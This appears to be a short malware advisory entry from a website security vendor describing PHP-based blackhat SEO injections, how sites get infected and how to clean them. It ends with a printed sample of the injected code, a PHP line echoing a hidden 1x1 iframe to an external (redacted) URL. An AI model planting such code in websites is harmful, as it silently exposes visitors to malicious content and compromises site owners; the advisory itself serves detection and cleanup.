Blackhat SEO is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as malicious iframe, or redirect) is visible in the browser, not the malicious code itself.
Sometimes the malware author isn't worried about if the code will be detected or not and add it in plain site, using PHP functions to load the iframe code.
Any vulnerable PHP based website. Outdated software or compromised passwords can act as an infection vector.
Inspect your files looking for the hidden iframes or any code that you do not recognize. Also, you can contact Sucuri to help you with the infection removal.
<?php echo "<iframe src="http://URL removed/img2/count.htm" width="1" height="1" frameborder="0"></iframe>"; ?>